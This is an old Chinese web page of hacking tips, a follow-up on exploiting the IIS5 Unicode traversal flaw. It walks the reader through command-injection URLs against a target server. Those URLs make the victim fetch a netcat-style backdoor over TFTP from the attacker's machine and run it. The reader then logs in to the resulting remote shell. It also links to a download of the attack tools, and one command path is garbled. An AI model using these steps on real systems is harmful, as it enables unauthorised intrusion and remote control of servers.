|
| 技术资料 > ASP技术 > 安全加密 : IIS5 UNICODE 编码漏洞的利用心得补充 |
IIS5 UNICODE 编码漏洞的利用心得补充
March 25,2004 |
看了你的文章【unicode】写的很好,
我来说说用tftp怎么搞:
下载http://www.cners.com/tools/unicode.zip(下载快着呢)
解压:
tftpd32.exe
ncx99.exe
本机运行tftpd32.exe
再(接着你的来):
http://192.168.8.48/scripts/ccc.exe?/c+tftp -i 本地ip GET ncx99.exe c:\inetpub\scripts\hihi.exe
注意了:这是将你本机的ncx99.exe 上传到对方的 scripts下!
下面执行它:
http://192.168.8.48/scripts/ccc.exe?/c+c:inetpubscriptssr.exe
这时在你的tftp上就能看到对方ip的信息了!
下面可以干的就不用说了!
用telnet 或SecureCRT.EXE软件登陆192.168.8.48就可以了!(推荐用SecureCrt)
{
零点
http://www.net7b.com{我的站点}
http://www.net7b.com/net7b_heike(网络奇兵网络安全中心)
|
|
Copyright © 2001-2008 Shenzhen Hiblue Software Team All rights reserved
